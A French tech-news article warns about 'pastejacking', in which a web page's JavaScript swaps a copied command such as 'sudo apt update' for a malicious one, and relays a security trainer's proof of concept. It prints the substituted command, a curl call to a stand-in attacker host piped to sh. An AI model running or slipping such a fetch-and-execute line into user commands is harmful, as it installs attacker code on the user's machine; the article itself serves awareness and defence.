Piratage : Copier-coller des commandes issues d’une page web peut être très dangereux !

Les programmeurs, les administrateurs système, les chercheurs en sécurité ou encore ceux qui aiment bidouiller sur leur PC ont pour habitude de copier-coller des commandes couramment utilisés à partir d'une page web. Seulement et comme le rappelle le spécialiste Gabriel Friedlander, cette pratique n'est pas sans risque. Loin de là.

copier-coller danger
Crédits : Pixabay

Le copier-coller fait partie des manipulations les plus utilisées, que ce soit par les utilisateurs lambda, les programmeurs, les administrateur système, les chercheurs en sécurité informatique ou encore ceux qui aiment bidouiller sur leur PC. Seulement, Gabriel Friendlander, fondateur de la plateforme de formation à la sécurité informatique Wizer, tient à rappeler que cette pratique est loin d'être sans risque, notamment lorsqu'il s'agit de copier-coller des commandes affichées sur des pages Web.

En effet, il n'est pas rare que les développeurs, novices comme expérimentés, copient-collent des commandes couramment utilisées à partir d'une page web (StackOverflow par exemple) dans leurs applications, dans une invite de commande Windows ou dans un terminal Linux.

Mais comme le rappelle M. Friendlander, il existe une méthode qui permet à un attaquant de modifier le contenu de votre presse papier. Le PastJacking, c'est son nom, consiste à l'introduction de lignes de codes malveillantes qui seront automatiquement exécutées lorsque l'utilisateur va coller son texte dans une fenêtre de terminal. Dans une preuve de concept plutôt simple publiée sur son blog personnel, M. Friedlander demande aux lecteurs de copier une commande que la plupart des administrateurs système et des développeurs connaissent : sudo apt udpate (ndrl : une commande utilisée pour récupérer des informations mises à jour sur les logiciels installés sur votre système).

À lire également : Windows 11 – Microsoft veut révolutionner le copier-coller sur Edge et Chrome

Un copier-coller peut faire de gros dégâts

En copiant-collant cette commande dans une zone de texte ou un bloc-note, on se rend compte que le contenu est totalement différent. En effet, la commande sudo apt update est devenue curl http://attacker-domain:8000/shell.sh | sh. En réalité, la supercherie se trouve dans le code Javascript caché derrière la page HTML de la preuve de concept mise en place par Friendlander.

Pour faire simple, dès que vous copiez la commande “sudo apt update” dans un élément HTML, le bout de code malveillant affiché ci-dessous s'exécute. Plus précisément, c'est un écouteur d'évènements Javascript qui capture l'évènement de copie et remplace les données du presse-papiers par le code malveillant de M. Friedlander. “C'est pourquoi vous ne devriez jamais copier-coller des commandes directement dans votre terminal […] Il suffit d'une seule ligne de code injectée dans le code que vous avez copié pour créer une porte dérobée dans votre application. Cette attaque est très simple, mais particulièrement efficace”, prévient-il.

Source : Bleeding Computer


Réagissez à cet article !

Demandez nos derniers articles !

Bon plan Galaxy Z Flip 7 : Samsung offre près de 300 € de réduction sur son smartphone pliable ce week-end

Déjà affiché près de 200 € sous son tarif de lancement, le Galaxy Z Flip 7 voit son prix chuter davantage sur le site Samsung. Grâce au code promo MAMAN10,…

Ninja CREAMi Deluxe 10-en-1 : bon plan sur le pack machine à glace + 4 pots, ça va vous rafraîchir !

Depuis plusieurs jours, la canicule s’est installée en France. Chacun fait comme il peut pour se rafraîchir et les glaces ont un franc succès. Mais saviez-vous qu’il existe une machine…

Ce VPN complet avec antivirus intégré est à un petit prix (-88%), avec 4 mois offerts

Surfshark fait partie des rares VPN à proposer une offre très complète pour un tarif situé sous la barre des 2 €. Grâce à une offre exclusive aux lecteurs de…

Ces catapultes prévues sur la Lune pourraient aussi servir à frapper la Terre

Sur la Lune, des catapultes géantes pourraient un jour propulser des satellites dans l’espace. Des entreprises y voient une avancée majeure pour la logistique spatiale. Un rapport alarmant y voit…

Vous attendez la mise à jour One UI 8.5 sur votre smartphone Samsung qui date de plus de 3 ans ? On a une mauvaise nouvelle

Certains modèles de smartphones Samsung qui ont reçu One UI 8.5 et qui auraient pu prétendre à la mise à jour vers One UI 8.5 ne seraient finalement pas pris…

Marre de l’IA dans vos recherches Google ? Cette méthode permet de l’exclure sur tous les navigateurs

Si vous êtes fatigués de voir l’IA vous proposer des résultats lors de vos recherches, sachez qu’il existe un moyen simple et rapide de s’en débarrasser. Cerise sur le gâteau,…

Le RedMagic 11s Pro arrive en France et son processeur est vraiment étonnant

Six mois après l’excellent RedMagic 11 Pro, ZTE revient avec un nouveau smartphone gaming premium : le RedMagic 11s Pro. Si la fiche technique ne change que très peu entre…

Ces étoiles les plus répandues dans notre galaxie dévorent leurs propres planètes, voici la preuve

Des astronomes viennent de percer l’un des secrets les mieux gardés de notre galaxie. Les étoiles les plus communes de la Voie lactée seraient de véritables prédatrices. Elles dévorent leurs…

Test JBL Live 780NC : un casque à l’excellent rapport qualité-prix

Trois ans après avoir sorti le JBL Live 770NC, la marque américaine revient avec un casque sans fil circum-auriculaire avec réduction de bruit active : le JBL Live 780NC. Positionné…

Galaxy Watch : Samsung sur le point de sortir un modèle de montre connectée auquel on ne s’attendait pas

Les nouvelles montres connectées de Samsung pour l’année 2026 viennent de fuiter. Une certaine Galaxy Watch 9 Classic attire tout particulièrement notre attention. On se rapproche doucement du grand événement…